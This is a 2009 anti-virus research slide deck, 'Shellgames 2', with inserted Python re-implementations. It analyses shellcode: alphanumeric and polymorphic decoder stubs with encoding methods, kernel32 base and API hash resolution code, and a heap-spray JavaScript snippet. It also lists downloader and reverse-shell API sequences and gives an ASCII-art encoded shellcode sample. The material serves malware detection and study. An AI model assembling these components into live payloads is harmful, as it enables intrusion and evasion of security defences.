Shellgames - Peter Ferrie


Shellgames 2
Peter Ferrie
Senior Anti-virus Researcher
19 February, 2009
1
Example Shellcode
Alphanumeric ASCII

Mixed-case

56              PUSH ESI
33 34 64        XOR ESI, DWORD PTR SS:[ESP]
4E              DEC ESI
6A 41           PUSH +41
58              POP EAX
34 65           XOR AL, 65
50              PUSH EAX
33 34 64        XOR ESI, DWORD PTR SS:[ESP]
l1: 46          INC ESI
6B 44 71 65 30  IMUL EAX, DWORD PTR DS:[ESI*2 + ECX + 65], +30
32 44 71 66     XOR AL, BYTE PTR DS:[ESI*2 + ECX + 66]
30 44 31 41     XOR BYTE PTR DS:[ESI + ECX + 41], AL
75              [JNE l1]
45 45           [encoded F0]
Peter Ferrie, Microsoft Corporation
2
Example Shellcode
Polymorphism

Mixed-case ASCII

54              PUSH ESP
54              PUSH ESP
51              PUSH ECX
51              PUSH ECX
52              PUSH EDX
6A 34           PUSH +34
68 43 4A 63 6A  PUSH 6A634A43
56              PUSH ESI
61              POPAD
52              PUSH EDX
59              POP ECX
47              INC EDI
6A 53           PUSH +53
58              POP EAX
52              PUSH EDX
34 53           XOR AL, 53
48              DEC EAX
43              INC EBX
34 7A           XOR AL, 7A
30 42 68        XOR BYTE PTR DS:[EDX + 68], AL
l1: 58          POP EAX
52              PUSH EDX
51              PUSH ECX
50              PUSH EAX
50              PUSH EAX
5A              POP EDX
6A 4E           PUSH +4E
58              POP EAX
3
Example Shellcode
Polymorphism

Mixed-case ASCII (cont.)

34 4E           XOR AL, 4E
50              PUSH EAX
32 42 54        XOR AL, BYTE PTR DS:[EDX + 54]
30 42 54        XOR BYTE PTR DS:[EDX + 54], AL
58              POP EAX
32 41 69        XOR AL, BYTE PTR DS:[ECX + 69]
30 42 54        XOR BYTE PTR DS:[EDX + 54], AL
58              POP EAX
59              POP ECX
5A              POP EDX
50              PUSH EAX
47              INC EDI
45              INC EBP
43              INC EBX
4C              DEC ESP
44              INC ESP
48              DEC EAX
47              INC EDI
4B              DEC EBX
45              INC EBP
4F              DEC EDI
4D              DEC EBP
47              INC EDI
45              INC EBP
4D              DEC EBP
48              DEC EAX
4F              DEC EDI
49              DEC ECX
4
Example Shellcode
Polymorphism

Mixed-case ASCII (cont.)

4D              DEC EBP
4F              DEC EDI
41              INC ECX
4F              DEC EDI
47              INC EDI
6B 41 6B 6F     IMUL EAX, DWORD PTR DS:[ECX + 6B], +6F
44              INC ESP
4C              DEC ESP
41              INC ECX
33 41 69        XOR EAX, DWORD PTR DS:[ECX + 69]
32 42 69        XOR AL, BYTE PTR DS:[EDX + 69]
30 42 69        XOR BYTE PTR DS:[EDX + 69], AL
41              INC ECX
42              INC EDX
45              INC EBP
39 34 6B        CMP DWORD PTR DS:[EBP*2 + EBX], ESI
75 30           [JNE l1]
5
Example Shellcode
Polymorphism

Mixed-case ASCII

55              PUSH EBP
50              PUSH EAX
51              PUSH ECX
51              PUSH ECX
55              PUSH EBP
6A 34           PUSH +34
68 42 4E 4D 31  PUSH 314D4E42
51              PUSH ECX
61              POPAD
52              PUSH EDX
59              POP ECX
6A 45           PUSH +45
58              POP EAX
34 45           XOR AL, 45
43              INC EBX
52              PUSH EDX
47              INC EDI
48              DEC EAX
34 7A           XOR AL, 7A
30 42 68        XOR BYTE PTR DS:[EDX + 68], AL
l1: 58          POP EAX
52              PUSH EDX
51              PUSH ECX
50              PUSH EAX
50              PUSH EAX
5A              POP EDX
6A 41           PUSH +41
58              POP EAX
6
Example Shellcode
Polymorphism

Mixed-case ASCII (cont.)

34 41           XOR AL, 41
50              PUSH EAX
32 42 55        XOR AL, BYTE PTR DS:[EDX + 55]
30 42 55        XOR BYTE PTR DS:[EDX + 55], AL
58              POP EAX
32 41 6B        XOR AL, BYTE PTR DS:[ECX + 6B]
30 42 55        XOR BYTE PTR DS:[EDX + 55], AL
58              POP EAX
59              POP ECX
5A              POP EDX
50              PUSH EAX
44              INC ESP
42              INC EDX
4B              DEC EBX
4C              DEC ESP
4C              DEC ESP
4A              DEC EDX
4A              DEC EDX
41              INC ECX
4C              DEC ESP
42              INC EDX
44              INC ESP
47              INC EDI
49              DEC ECX
47              INC EDI
42              INC EDX
4A              DEC EDX
44              INC ESP
7
Example Shellcode
Polymorphism

Mixed-case ASCII (cont.)

48              DEC EAX
43              INC EBX
4C              DEC ESP
48              DEC EAX
4F              DEC EDI
44              INC ESP
6B 41 69 52     IMUL EAX, DWORD PTR DS:[ECX + 69], +52
47              INC EDI
41              INC ECX
33 41 69        XOR EAX, DWORD PTR DS:[ECX + 69]
32 42 69        XOR AL, BYTE PTR DS:[EDX + 69]
30 42 69        XOR BYTE PTR DS:[EDX + 69], AL
41              INC ECX
42              INC EDX
45              INC EBP
39 34 6B        CMP DWORD PTR DS:[EBP*2 + EBX], ESI
75 30           [JNE l1]
11
Alphanumeric Decoders
Two major types
- IMUL 10
- IMUL 30
IMUL 10 is original, simplest, but larger
- Precise bit control
- Two nybbles: 4 bits and 4 bits
- 10 is not alphanumeric, must be constructed
IMUL 30 is smaller but harder to encode
- XOR against original changes bit ratio
- More like 3 bits and 5 bits
Obscure type: AAD
12
IMUL 10 Decoding
Alphanumeric ASCII

Mixed-case

37 (x25)        AAA                     ; AAA * 25
6A 41           PUSH +41
58              POP EAX
50              PUSH EAX
30 41 30        XOR BYTE PTR DS:[ECX + 30], AL
l1: 41          INC ECX
6B 41 41 51     IMUL EAX, DWORD PTR DS:[ECX + 41], +51
32 41 42        XOR AL, BYTE PTR DS:[ECX + 42]
32 42 42        XOR AL, BYTE PTR DS:[EDX + 42]
30 42 42        XOR BYTE PTR DS:[EDX + 42], AL
41              INC ECX
42              INC EDX
58              POP EAX
50              PUSH EAX
38 41 42        CMP BYTE PTR DS:[ECX + 42], AL
75              [JNE l1]
4A 49           [encoded E9]
41
15
IMUL 10 Decoding
Alphanumeric ASCII

Mixed-case

37 (x25)        AAA                     ; AAA * 25
6A 41           PUSH +41
58              POP EAX
50              PUSH EAX
30 41 30        XOR BYTE PTR DS:[ECX + 30], AL
l1: 41          INC ECX
6B 41 41 10     IMUL EAX, DWORD PTR DS:[ECX + 41], +10
32 41 42        XOR AL, BYTE PTR DS:[ECX + 42]
32 42 42        XOR AL, BYTE PTR DS:[EDX + 42]
30 42 42        XOR BYTE PTR DS:[EDX + 42], AL
41              INC ECX
42              INC EDX
58              POP EAX
50              PUSH EAX
38 41 42        CMP BYTE PTR DS:[ECX + 42], AL
75              [JNE l1]
4A 49           [encoded E9]
41
16
IMUL 10 Decoding
Alphanumeric ASCII

Mixed-case

Decode E9 using 4A and 49
IMUL EAX, DWORD PTR DS:[ECX + 41], +10    4A * 10 = [4]A0
XOR AL, BYTE PTR DS:[ECX + 42]            A0 ^ 49 = E9
XOR AL, BYTE PTR DS:[EDX + 42]            E9 ^ 4A = A3
XOR BYTE PTR DS:[EDX + 42], AL            A3 ^ 4A = E9
17
IMUL 10 Encoding
Given a value: E9
Start with low nybble (9)
Encode as ASCII (39/49/59/69/79)
Xor the high nybble of the decoded value (E) with the high nybble of each encoded candidate
- E^3=D
- E^4=A
- E^5=B
- E^6=8
- E^7=9
Encode as ASCII (3D/4D/5D/6D/7D or 3A/4A/5A/6A/7A, etc)
Exclude illegal candidates (3D, 7D, 3A, etc)
Pick a pair, big-endian order (4A, 49)
18
IMUL 30 Decoding
Alphanumeric ASCII

Mixed-case IMUL 30

56              PUSH ESI
33 34 64        XOR ESI, DWORD PTR SS:[ESP]
4E              DEC ESI
6A 41           PUSH +41
58              POP EAX
34 65           XOR AL, 65
50              PUSH EAX
33 34 64        XOR ESI, DWORD PTR SS:[ESP]
l1: 46          INC ESI
6B 44 71 65 30  IMUL EAX, DWORD PTR DS:[ESI*2 + ECX + 65], +30
32 44 71 66     XOR AL, BYTE PTR DS:[ESI*2 + ECX + 66]
30 44 31 41     XOR BYTE PTR DS:[ESI + ECX + 41], AL
75              [JNE l1]
45 45           [encoded F0]
20
IMUL 30 Decoding
Alphanumeric ASCII

Mixed-case IMUL 30

Decode F0 using 45 and 45
IMUL EAX, DWORD PTR DS:[ESI*2 + ECX + 65], +30   45 * 30 = [C]F0
XOR AL, BYTE PTR DS:[ESI*2 + ECX + 66]           F0 ^ 45 = B5
XOR BYTE PTR DS:[ESI + ECX + 41], AL             B5 ^ 45 = F0
21
IMUL 30 Encoding
Given a value: F8
Start with the high nybble (F)
Use table lookup:
  0 -> 0 (0 * 30 = [0]00)    8 -> 8 (8 * 30 = [1]80)
  1 -> B (B * 30 = [2]10)    9 -> 3 (3 * 30 = [0]90)
  2 -> 6 (6 * 30 = [1]20)    A -> E (E * 30 = [2]A0)
  3 -> 1 (1 * 30 = [0]30)    B -> 9 (9 * 30 = [1]B0)
  4 -> C (C * 30 = [2]40)    C -> 4 (4 * 30 = [0]C0)
  5 -> 7 (7 * 30 = [1]50)    D -> F (F * 30 = [2]D0)
  6 -> 2 (2 * 30 = [0]60)    E -> A (A * 30 = [1]E0)
  7 -> D (D * 30 = [2]70)    F -> 5 (5 * 30 = [0]F0)
Encode as ASCII (35/45/55/65/75)
22
IMUL 30 Encoding
Xor low nybble (8) and encoded values
- 08 ^ 35 = 3D
- 08 ^ 45 = 4D
- 08 ^ 55 = 5D
- 08 ^ 65 = 6D
- 08 ^ 75 = 7D
Exclude illegal candidates (3D, 5D, 7D)
Pick a pair, big-endian order (45, 4D)
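The arithmetic of slides 16, 17, 20, 21 and 22, as an added Python example that is not part of the original slides. It reproduces the two worked decodes (4A 49 -> E9, 45 45 -> F0), derives the IMUL 30 lookup table instead of copying it, and enumerates the legal IMUL 10 pairs the way slide 17 describes; the function names and the ALNUM set are ours.

```python
# Added example (not from the slides): the decode arithmetic behind the
# IMUL 10 and IMUL 30 decoders, the high-nybble table of the IMUL 30 encoder,
# and the candidate search of the IMUL 10 encoder.  Function names are ours.

ALNUM = set(b"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")


def imul10_decode(p0: int, p1: int) -> int:
    """IMUL EAX, [pair], +10 leaves (p0 & 0F) << 4 in AL, then XOR AL, p1.
    The two XORs against the target byte that follow in the loop cancel,
    so the target ends up holding AL itself (slide 16: 4A, 49 -> E9)."""
    return ((p0 * 0x10) & 0xFF) ^ p1


def imul30_decode(p0: int, p1: int, target: int) -> int:
    """IMUL by 30 gives a scrambled high nybble and a zero low nybble in AL;
    XOR AL, p1; then the decoder XORs AL into whatever byte already sits at
    the target (slide 20: 45, 45 over a 45 -> F0)."""
    return target ^ (((p0 * 0x30) & 0xFF) ^ p1)


def imul30_high_table() -> dict:
    """Slide 21 table: for each high nybble h, the nybble x whose product
    x * 30 has low byte h0."""
    table = {}
    for x in range(16):
        low_byte = (x * 0x30) & 0xFF
        assert low_byte & 0x0F == 0          # 30 is a multiple of 10
        table[low_byte >> 4] = x
    return table


def imul10_candidates(value: int) -> list:
    """Slide 17 procedure: p1 keeps the low nybble of value in its own low
    nybble; the high nybble of value XOR the high nybble of p1 becomes the
    low nybble of p0.  Non-alphanumeric bytes are excluded.  Returns (p0, p1)
    pairs in big-endian order."""
    pairs = []
    for hi1 in range(3, 8):                   # 3x/4x/5x/6x/7x candidates
        p1 = (hi1 << 4) | (value & 0x0F)
        if p1 not in ALNUM:
            continue
        low0 = (value >> 4) ^ hi1
        for hi0 in range(3, 8):
            p0 = (hi0 << 4) | low0
            if p0 in ALNUM:
                pairs.append((p0, p1))
    return pairs
```

Feeding slide 22's pair (45, 4D) to `imul30_decode` over a target byte of 45 gives F8, which is the "XOR against original" dependency of slide 11: the IMUL 30 encoder has to know what byte the decoder will find at the target.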
23
IMUL 10 Decoding
Alphanumeric ASCII

Upper-case IMUL 10

37 (x12)        AAA                     ; AAA * 12
56              PUSH ESI
54              PUSH ESP
58              POP EAX
33 30           XOR ESI, DWORD PTR DS:[EAX]
56              PUSH ESI
58              POP EAX
34 41           XOR AL, 41
50              PUSH EAX
30 41 33        XOR BYTE PTR DS:[ECX + 33], AL
48              DEC EAX
48              DEC EAX
30 41 30        XOR BYTE PTR DS:[ECX + 30], AL
30 41 42        XOR BYTE PTR DS:[ECX + 42], AL
l1: 41          INC ECX
41              INC ECX
42              INC EDX
54 41 41 51     [IMUL EAX, DWORD PTR DS:[ECX + 41], +10]
32 41 42        XOR AL, BYTE PTR DS:[ECX + 42]
32 42 42        XOR AL, BYTE PTR DS:[EDX + 42]
30 42 42        XOR BYTE PTR DS:[EDX + 42], AL
58              POP EAX
50              PUSH EAX
38 41 43        CMP BYTE PTR DS:[ECX + 43], AL
4A              [JNE l1]
4A 49           [encoded E9]
29
Other Decoders
AAD
- Combines MUL and ADD (instead of XOR) in one instruction
- Little-endian ordering
- Never seen outside (so far)

AX = [word]
AAD 30 (or 10)
[byte] = AL
30
Other Decoders
Base64

l1: AD          LODS DWORD PTR DS:[ESI]
6A 04           PUSH +04
59              POP ECX
l2: C1 C0 08    ROL EAX, 08
3C 30           CMP AL, 30
73 05           JNB l3
04 BD           ADD AL, BD
C0 E8 02        SHR AL, 02
l3: 04 04       ADD AL, 04
3C 3F           CMP AL, 3F
76 08           JBE l4
2C 45           SUB AL, 45
3C 19           CMP AL, 19
76 02           JBE l4
2C 06           SUB AL, 06
l4: 0F AC C3 06 SHRD EBX, EAX, 06
E2 E0           LOOPD l2
93              XCHG EBX, EAX
0F C8           BSWAP EAX
AB              STOS DWORD PTR ES:[EDI]
4F              DEC EDI
80 3E 20        CMP BYTE PTR DS:[ESI], 20
75 D2           JNE l1
31
Other Decoders
Base64 (alternative)

l1: AD          LODS DWORD PTR DS:[ESI]
4F              DEC EDI
6A 04           PUSH +04
59              POP ECX
l2: C1 C0 08    ROL EAX, 08
3C 30           CMP AL, 30
73 05           JNB l3
04 BD           ADD AL, BD
C0 E8 02        SHR AL, 02
l3: 04 04       ADD AL, 04
3C 3F           CMP AL, 3F
76 08           JBE l4
2C 45           SUB AL, 45
3C 19           CMP AL, 19
76 02           JBE l4
2C 06           SUB AL, 06
l4: 0F AC C3 06 SHRD EBX, EAX, 06
E2 E0           LOOPD l2
93              XCHG EBX, EAX
0F C8           BSWAP EAX
AB              STOS DWORD PTR ES:[EDI]
75 D5           JNE l1
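The Base64 decoder of slide 30, re-implemented in Python as an added example (not from the slides, and not the author's code) so that its compare/add/subtract chain can be checked against the standard library; the function names and sample inputs are ours. Like the stub it understands no '=' padding, processes four characters per LODS, and stops when the byte after a group is a space.

```python
# Added example (not from the slides): a Python re-implementation of the
# Base64 decoder stub on slide 30, kept instruction-for-instruction so the
# branch structure can be checked against the real thing.  Names are ours.
import base64


def sextet(ch: int) -> int:
    """Map one Base64 character to its 6-bit value using the stub's
    compare/add/subtract chain rather than a lookup table."""
    al = ch
    if al < 0x30:                         # CMP AL, 30 / JNB l3 not taken: '+' or '/'
        al = (al + 0xBD) & 0xFF           # ADD AL, BD   ('+' -> E8, '/' -> EC)
        al >>= 2                          # SHR AL, 02   (-> 3A / 3B)
    al = (al + 0x04) & 0xFF               # l3: ADD AL, 04 (digits land on 34..3D)
    if al > 0x3F:                         # CMP AL, 3F / JBE l4
        al = (al - 0x45) & 0xFF           # SUB AL, 45   ('A'..'Z' -> 00..19)
        if al > 0x19:                     # CMP AL, 19 / JBE l4
            al = (al - 0x06) & 0xFF       # SUB AL, 06   ('a'..'z' -> 1A..33)
    return al


def decode_stub(buf: bytes) -> bytes:
    """Decode 4-character groups until the byte after a group is a space
    (CMP BYTE PTR [ESI], 20).  No '=' padding is understood, like the stub."""
    out = bytearray()
    esi = 0
    while True:
        eax = int.from_bytes(buf[esi:esi + 4], "little")   # LODS DWORD PTR [ESI]
        esi += 4
        ebx = 0
        for _ in range(4):                                  # PUSH 4 / POP ECX ... LOOPD l2
            eax = ((eax << 8) | (eax >> 24)) & 0xFFFFFFFF   # ROL EAX, 08
            eax = (eax & 0xFFFFFF00) | sextet(eax & 0xFF)
            ebx = ((ebx >> 6) | (eax << 26)) & 0xFFFFFFFF   # SHRD EBX, EAX, 06
        eax = int.from_bytes(ebx.to_bytes(4, "little"), "big")  # XCHG EBX, EAX / BSWAP EAX
        out += eax.to_bytes(4, "little")                    # STOS DWORD PTR ES:[EDI]
        out.pop()                                           # DEC EDI: 4th byte is rewritten next pass
        if buf[esi] == 0x20:                                # JNE l1 otherwise
            return bytes(out)


def roundtrip(data: bytes) -> bool:
    """Encode with the standard library and decode with the stub logic;
    only whole 3-byte multiples apply, since the stub has no padding path."""
    return decode_stub(base64.b64encode(data) + b" ") == data
```

Because the ROL comes first, the characters of a group are consumed in the order c4, c3, c2, c1, and SHRD pushes each sextet in at the top of EBX, so after four rounds EBX holds the three output bytes in big-endian order with eight zero bits below them; BSWAP turns that into the little-endian store that STOS writes.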
32
Next Steps
Finding the kernel32 base

SEH walker:
33 F6                 XOR ESI, ESI
64 AD                 LODS DWORD PTR FS:[ESI]
40                    INC EAX
l1: 48                DEC EAX
96                    XCHG ESI, EAX
AD                    LODS DWORD PTR DS:[ESI]
40                    INC EAX
75 FA                 JNE l1
AD                    LODS DWORD PTR DS:[ESI]
97                    XCHG EDI, EAX
l2: 4F                DEC EDI
66 33 FF              XOR DI, DI
66 81 3F 4D 5A        CMP WORD PTR DS:[EDI], 5A4D
75 F5                 JNE l2
8B 47 3C              MOV EAX, DWORD PTR DS:[EDI + 3C]
81 3C 07 50 45 00 00  CMP DWORD PTR DS:[EAX + EDI], 00004550
75 E9                 JNE l2

LDR_DATA_TABLE_ENTRY:
64 67 A1 30 00        MOV EAX, DWORD PTR FS:[0030]
8B 78 0C              MOV EDI, DWORD PTR DS:[EAX + 0C]
8B 77 1C              MOV ESI, DWORD PTR DS:[EDI + 1C]
AD                    LODS DWORD PTR DS:[ESI]
8B 78 08              MOV EDI, DWORD PTR DS:[EAX + 08]
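The l2 loop of the SEH walker (step down 64 KiB at a time, check for 'MZ', follow e_lfanew, check for 'PE\0\0'), as an added Python example that is not from the slides. It runs over a constructed in-memory image rather than a live process, which is also how a memory-dump carver validates a PE header; the names and the sample layout are ours.

```python
# Added example (not from the slides): the validation loop at label l2 of the
# SEH walker on slide 32, re-implemented over an in-memory image so the MZ/PE
# checks can be exercised offline.  Names and the sample image are ours.
import struct

IMAGE_DOS_SIGNATURE = b"MZ"         # CMP WORD PTR [EDI], 5A4D
IMAGE_NT_SIGNATURE = b"PE\0\0"      # CMP DWORD PTR [EAX + EDI], 00004550


def find_image_base(mem: bytes, mem_base: int, start: int):
    """Walk downwards from `start` in 64 KiB steps (DEC EDI; XOR DI, DI)
    until an 'MZ' header whose e_lfanew points at 'PE\\0\\0' is found.
    `mem` is the memory image that begins at address `mem_base`."""
    edi = start
    while True:
        edi = (edi - 1) & ~0xFFFF          # DEC EDI; XOR DI, DI
        if edi < mem_base:
            return None                    # ran below the region we hold
        off = edi - mem_base
        if mem[off:off + 2] != IMAGE_DOS_SIGNATURE:
            continue                       # JNE l2
        if off + 0x40 > len(mem):
            continue                       # no room for a DOS header here
        e_lfanew = struct.unpack_from("<I", mem, off + 0x3C)[0]   # MOV EAX, [EDI + 3C]
        pe = off + e_lfanew
        if mem[pe:pe + 4] == IMAGE_NT_SIGNATURE:
            return edi
        # a stray 'MZ' with a bad e_lfanew: JNE l2 keeps walking


def sample_image() -> tuple:
    """Constructed 192 KiB region mapped at 0x10000: a decoy 'MZ' at 0x30000
    with a bogus e_lfanew, and a genuine header at 0x20000 whose e_lfanew
    (0x80) lands on 'PE\\0\\0'.  Returns (memory, base address)."""
    base = 0x10000
    mem = bytearray(0x30000)
    real = 0x20000 - base
    mem[real:real + 2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", mem, real + 0x3C, 0x80)
    mem[real + 0x80:real + 0x84] = IMAGE_NT_SIGNATURE
    decoy = 0x30000 - base
    mem[decoy:decoy + 2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", mem, decoy + 0x3C, 0xFFFF)   # points into nothing useful
    return bytes(mem), base
```

Starting from an address inside the decoy's 64 KiB block, the walk rejects the decoy on the PE check and continues to the genuine header one block below; the XOR DI, DI alignment is why the stub never has to know the image's size.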
33
Next Steps
API resolution

String compare:
33 ED                 XOR EBP, EBP
l1: 45                INC EBP
8B 14 AB              MOV EDX, DWORD PTR SS:[EBP*4 + EBX]
81 3C 3A 57 69 6E 45  CMP DWORD PTR DS:[EDI + EDX], "EniW"
75 F3                 JNE l1
8B 74 3E 1C           MOV ESI, DWORD PTR DS:[EDI + ESI + 1C]
03 F7                 ADD ESI, EDI
03 3C AE              ADD EDI, DWORD PTR DS:[EBP*4 + ESI]
34
Next Steps
API resolution

Hashing:
33 C9           XOR ECX, ECX
53              PUSH EBX
49              DEC ECX
l1: 41          INC ECX
AD              LODS DWORD PTR DS:[ESI]
5B              POP EBX
03 C3           ADD EAX, EBX
53              PUSH EBX
33 DB           XOR EBX, EBX
l2: 0F BE 10    MOVSX EDX, BYTE PTR DS:[EAX]
3A D6           CMP DL, DH
74 08           JE l3
C1 CB 07        ROR EBX, 07
03 DA           ADD EBX, EDX
40              INC EAX
EB F1           JMP SHORT l2
l3: 3B 1F       CMP EBX, DWORD PTR DS:[EDI]
75 E5           JNE l1
5A              POP EDX
5E              POP ESI
8B 5E 24        MOV EBX, DWORD PTR DS:[ESI + 24]
03 DA           ADD EBX, EDX
66 8B 0C 4B     MOV CX, WORD PTR DS:[ECX*2 + EBX]
8B 5E 1C        MOV EBX, DWORD PTR DS:[ESI + 1C]
03 DA           ADD EBX, EDX
8B 04 8B        MOV EAX, DWORD PTR DS:[ECX*4 + EBX]
03 C2           ADD EAX, EDX
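The ROR 7 / ADD name hash of the loop at l2 above, as an added Python example that is not from the slides; the function names and the constructed export list are ours. The table it builds is what an analyst uses to map the hash constants found in a sample back to API names.

```python
# Added example (not from the slides): the ROR-7/ADD name hash from the
# resolver on slide 34, plus the lookup table an analyst builds to turn hashes
# seen in a sample back into API names.  Names here are ours.


def ror32(value: int, count: int) -> int:
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror7_add_hash(name: bytes) -> int:
    """XOR EBX, EBX; then per byte: MOVSX EDX, [EAX]; CMP DL, DH / JE l3
    (stops on a NUL, or on FF, the two bytes whose sign extension equals
    the byte itself); ROR EBX, 07; ADD EBX, EDX."""
    ebx = 0
    for c in name + b"\0":
        dl, dh = c, (0xFF if c & 0x80 else 0x00)     # MOVSX sign-extends into DH
        if dl == dh:                                  # CMP DL, DH / JE l3
            break
        edx = c - 0x100 if c & 0x80 else c           # signed contribution of the byte
        ebx = (ror32(ebx, 7) + edx) & 0xFFFFFFFF     # ROR EBX, 07 / ADD EBX, EDX
    return ebx


def hash_table(names) -> dict:
    """Precompute {hash: name} for a list of exported names."""
    return {ror7_add_hash(n): n for n in names}


# Constructed export-name list (a few real kernel32 names; the selection is ours).
SAMPLE_EXPORTS = [b"CreateProcessA", b"GetProcAddress", b"LoadLibraryA", b"WinExec"]
SAMPLE_TABLE = hash_table(SAMPLE_EXPORTS)


def name_for_hash(h: int, table: dict = SAMPLE_TABLE):
    """The reverse of CMP EBX, [EDI]: which export produced this constant."""
    return table.get(h)
```

Because the loop compares the whole 32-bit hash, a table built over every export of the libraries a sample imports resolves each constant in its hash list directly; collisions are possible but rare at this width.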
36
Next Steps
Downloader
- Urlmon!UrlDownloadToFileA
- Kernel32!WinExec
Backdoor
- Bind-shell
  - Ws2_32!WSASocketA, bind, listen, accept
  - Kernel32!CreateProcess hStdInput = hStdOutput = socket
- Connect-back
  - Ws2_32!WSASocketA, connect
  - Kernel32!CreateProcess hStdInput = hStdOutput = socket
- http
  - Kernel32!CreateProcessA(iexplore.exe)
37
Special Cases
Office
- Loading the second stage
  - File handle
  - Stream handle
Stealth
- Repair
- Replace
Scripts
- Heap spray
    block = unescape("%u0c0c%u0c0c")
    nops = unescape("%u9090%u9090%u9090")
    while (block.length < 81920) block += block
    memory = new Array()
    for (i=0;i<1000;i++) memory[i] += (block + nops + shellcode)
Miscellaneous
- NOP-sleds
38
Visualisation
Spot the shellcode
Peter Ferrie, Microsoft Corporation
40
Visualisation
Certain common characters
- 90 (capital e-acute)
- E8 (capital phi)
- E9 (capital theta)
- EB (small delta)
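An added Python example (not from the slides) of the rendering the visualisation slides rely on: bytes shown as code page 437 glyphs, and a sliding window that counts the four opcode glyphs listed above so the densest region stands out; the window size, the sample buffer and the names are ours.

```python
# Added example (not from the slides): render bytes as code page 437 glyphs,
# the way the "spot the shellcode" views do, and score windows by how many
# of the four listed opcode bytes they contain.  Names and sample are ours.

MARKERS = {0x90: "É", 0xE8: "Φ", 0xE9: "Θ", 0xEB: "δ"}   # NOP, CALL, JMP, JMP SHORT


def render_cp437(buf: bytes, width: int = 64) -> list:
    """Rows of glyphs, exactly as a CP437 text viewer shows the bytes."""
    text = buf.decode("cp437")
    return [text[i:i + width] for i in range(0, len(text), width)]


def densest_window(buf: bytes, window: int = 32) -> tuple:
    """(offset, marker count) of the window holding the most marker bytes;
    the first window reaching the maximum wins."""
    counts = [1 if b in MARKERS else 0 for b in buf]
    best_off, best = 0, sum(counts[:window])
    running = best
    for i in range(window, len(buf)):
        running += counts[i] - counts[i - window]
        if running > best:
            best_off, best = i - window + 1, running
    return best_off, best


# Constructed sample: printable filler, a 16-byte NOP sled, one CALL rel32
# (E8 FB FF FF FF, which calls the instruction itself), then more filler.
SAMPLE = bytes(range(0x20, 0x7F)) * 2 + b"\x90" * 16 + b"\xe8\xfb\xff\xff\xff" + b"ABC" * 8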
41
ASCII Art
Shark

VTX30VXH4r4PP34tjAX0DqbFkDqjQ2Dqk0D1Hu9YzttKUF8y6R4VkZ6tWH6jsrCwNOs0nrgVN8akdI4JPzWplKQQnVM47JnyDp
DD
MJ
GE
IL
HB
_,,
,dY
DA
IL
,iHGY
dAM;
IL
HG
sBMKY'
dNI:'
LG
IA
sIGKG1
fEGY?
IC
AE
dBGDGN;
fGI"
FJ
ND
dGCDAIL'
fPE:
LF
AC
dCLOBJJG;
fGL:
KD
DD
.dCFCGIHHHD
.
fDCl`
FP
CL
,sOBNGILPMPDKK w,_
.sEB
,FBEl;
BF
BF
_.,sHFB*"'*" , FHI' NHOOm mu,,._ .iKLAIb, ,BD*MN!:
DH
FA
_,s YGJFP'',sd,'PF HPMi "*JF* FHGAILb FND MIY`,LF' MB!`
NH
IA
_,os,'DNi YN' m,'IL; ELb`CAA 7m,, DMN lDD PPJJY* EHi IL!.
DE
LJ
.osADPFK,'MDi ',EHY BCb KNA lDMi`HBHi FPH !Dl lKi,ui:,*FECi:EB!
MH
FO
,sKILELCEADM,'NAbdPL* *YHbDMH:'JIL 7ELk iBM: l! 'A:+'+D; `''+1MNAi
DC
ML
,sJJFFPKY**"""'` 'LFHGBDiu,'**LPH';KMHb ?FLi ?EFi,
`
`'OK:
NP
PN
sAKNPPNA'`.*.wdJFb,'YLi `YT" ,uIA",iCHGAm,'+?+ `'+Lli
`'Y:,
DM
GG
YJIFAFEKNFFPPNAIFM!i`YA" .,:HE"',iPIJJFCFCmo,
IN
HM
"TCEDEK**"'`.LMGE? ',o?*'`` ```""**YHPBABKkm,
LK
LF
"*:HFEFCFC!"` '
``"*YFCFEk,
FC
FC
ii!
'*YFGk,
FC
PP
Y'
"Y7
FG
OE
IL
EG
PM
OLNJAAPANRRQOCOVFHZKDXCGHKURQZ[Shark Ascii Art Shellcode by SkyLined]LRWVASXHHPSSVHBHADPAYUOSPJKBN
42
Shark Attack
First stage

IMUL 10

33 C9           XOR ECX, ECX
56              PUSH ESI
54              PUSH ESP
58              POP EAX
33 30           XOR ESI, DWORD PTR DS:[EAX]
56              PUSH ESI
58              POP EAX
48              DEC EAX
34 72           XOR AL, 72
34 50           XOR AL, 50
50              PUSH EAX
33 34 74        XOR ESI, DWORD PTR SS:[ESI*2 + ESP]
6A 41           PUSH +41
58              POP EAX
30 44 71 62     XOR BYTE PTR DS:[ESI*2 + ECX + 62], AL
l1: 46          INC ESI
6B 44 71 6A 51  IMUL EAX, DWORD PTR DS:[ESI*2 + ECX + 6A], +51
32 44 71 6B     XOR AL, BYTE PTR DS:[ESI*2 + ECX + 6B]
30 44 31 48     XOR BYTE PTR DS:[ESI + ECX + 48], AL
75              [JNE l1]
39 59           [encoded F0]
43
Shark Attack
Second stage

IMUL 10

8D 71 62        LEA ESI, DWORD PTR [ECX + 62]
8D 79 43        LEA EDI, DWORD PTR [ECX + 43]
l1: AC          LODS BYTE PTR DS:[ESI]
2C 41           SUB AL, 41
3C 10           CMP AL, 10
73 F9           JNB l1
6B C8 10        IMUL ECX, EAX, +10
l2: AC          LODS BYTE PTR DS:[ESI]
2C 41           SUB AL, 41
3C 10           CMP AL, 10
73 F9           JNB l2
02 C1           ADD AL, CL
AA              STOS BYTE PTR ES:[EDI]
75 EA           JNE l1
44
ASCII Art
Organic

TX
``` .èÿÿÿÿñë.
` .dP*'
"Hh
dQ7
```` `8ë '
.GH' ``'````` AU ``
.,saaë,.
` ,ME: `''``` ` .ëO `
...
,,a3ÿ3þjAXHò®WWë
`` AYL `'.` ,a±H¶P© ,sƒñGTXu `
dKK*"'``
```"*6FCë, `
` :ñwš .', †î¶PKTX² dC²`
*6ò
`
aKF²
':ñwÉë
` GÁÉD, '., TX2ñ†7u dt' `''' 'Nh
7L,
` .éÂþÿÿ,
'@MMD `
`' :GJLh .,. "HEI" .O' `'''`` 1Mi `
`7P,..,dHEIJPD;`..` HEIJ!`
`'` ODFC, .,..
. dH ..'''''` EJ, ` `
`'"7HPHJF7*' `.` .JLJ7 `
`` :HNPLh .',.'`` OJ ````.'' :Mi `'`
`
,JCJ*
`` 7HKGCh `,"''` MJN,. ``'..` 'MP `''```
``````````
,iHE*
